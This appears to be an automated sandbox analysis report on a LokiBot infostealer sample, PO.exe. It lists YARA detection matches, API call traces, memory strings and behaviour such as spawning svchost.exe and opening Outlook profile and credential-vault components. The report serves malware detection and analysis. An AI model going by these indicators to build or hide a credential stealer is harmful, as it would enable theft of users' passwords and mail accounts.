Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: PO.exe PID: 6632, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\PO.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00993B3A
Source: PO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PO.exe, 00000000.00000000.2063593057.0000000000A44000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_9b454161-f
Source: PO.exe, 00000000.00000000.2063593057.0000000000A44000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_1271b75f-1
Source: PO.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_62a913f3-5
Source: PO.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c97b0964-4

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00302720 RegOpenKeyExW,RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegCloseKey,HeapAlloc,RegQueryValueExW,ExpandEnvironmentStringsW,LCMapStringW,RegQueryValueExW,HeapFree,AcquireSRWLockShared,ReleaseSRWLockShared,HeapAlloc,memcpy,memcpy,AcquireSRWLockExclusive,ReleaseSRWLockExclusive,RegGetValueW,ActivateActCtx,LoadLibraryExW,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,ActivateActCtx,MultiByteToWideChar,RtlRunOnceExecuteOnce,NtQuerySystemInformation,GetProcAddress,DeactivateActCtx,RegCloseKey,HeapAlloc,RegGetValueW,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,HeapFree,ExpandEnvironmentStringsW,HeapFree,CreateActCtxW,GetLastError,HeapFree,HeapFree,GetLastError,CreateActCtxW,GetLastError,ReleaseActCtx,GetLastError,GetLastError,RtlNtStatusToDosError,GetLastError,LoadLibraryExW,RtlNtStatusToDosError,LoadLibraryExW,RtlNtStatusToDosError,HeapFree,ReleaseActCtx,	2_2_00302720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00303540 RtlImageNtHeader,RpcMgmtSetServerStackSize,I_RpcServerDisableExceptionFilter,RtlSetProcessIsCritical,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProcessMitigationPolicy,SetProtectedPolicy,HeapSetInformation,NtSetInformationProcess,	2_2_00303540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_003033C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	2_2_003033C0

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_009FA1EF

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009E8310

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_009F51BD

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_0099E6A0	0_2_0099E6A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BD975	0_2_009BD975
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B21C5	0_2_009B21C5
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C62D2	0_2_009C62D2
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A103DA	0_2_00A103DA
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C242E	0_2_009C242E
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B25FA	0_2_009B25FA
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A66E1	0_2_009A66E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009EE616	0_2_009EE616
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C878F	0_2_009C878F
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009F8889	0_2_009F8889
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A8808	0_2_009A8808
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C6844	0_2_009C6844
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A10857	0_2_00A10857
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BCB21	0_2_009BCB21
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C6DB6	0_2_009C6DB6
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A6F9E	0_2_009A6F9E
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A3030	0_2_009A3030
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B3187	0_2_009B3187
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BF1D9	0_2_009BF1D9
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00991287	0_2_00991287
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B1484	0_2_009B1484
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A5520	0_2_009A5520
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B7696	0_2_009B7696
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A5760	0_2_009A5760
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B1978	0_2_009B1978
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009C9AB5	0_2_009C9AB5
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_0099FCE0	0_2_0099FCE0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009B1D90	0_2_009B1D90
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009BBDA6	0_2_009BBDA6
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00A17DDB	0_2_00A17DDB
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009A3FE0	0_2_009A3FE0
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_0099DF00	0_2_0099DF00
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00AF3630	0_2_00AF3630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00302720	2_2_00302720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040549C	2_2_0040549C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004029D4	2_2_004029D4

Source: C:\Users\user\Desktop\PO.exe	Code function: String function: 009B8900 appears 42 times
Source: C:\Users\user\Desktop\PO.exe	Code function: String function: 009B0AE3 appears 70 times
Source: C:\Users\user\Desktop\PO.exe	Code function: String function: 00997DE1 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00405B6F appears 42 times

Source: PO.exe, 00000000.00000003.2075601379.0000000003BF3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
Source: PO.exe, 00000000.00000003.2075333528.0000000003D9D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe

Source: PO.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO.exe.b90000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO.exe.b90000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3314480004.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2088699683.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: Process Memory Space: PO.exe PID: 6632, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 320, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/6@1/1

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009FA06A GetLastError,FormatMessageW,

0_2_009FA06A

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009E81CB AdjustTokenPrivileges,CloseHandle,	0_2_009E81CB
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_009E87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_009E87E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,	2_2_0040650A

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009FB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009FB3FB

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00A0EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00A0EE0D

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_009FC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_009FC397

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00994E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00994E89

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00303360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00303360

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00303360 I_RegisterSvchostNotificationCallback,StartServiceCtrlDispatcherW,ExitProcess,

2_2_00303360

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\aut1D03.tmp

Jump to behavior

Source: PO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: svchost.exe, 00000002.00000003.2077882159.00000000050A5000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO.exe	ReversingLabs: Detection: 31%
Source: PO.exe	Virustotal: Detection: 34%

Source: unknown	Process created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO.exe"
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
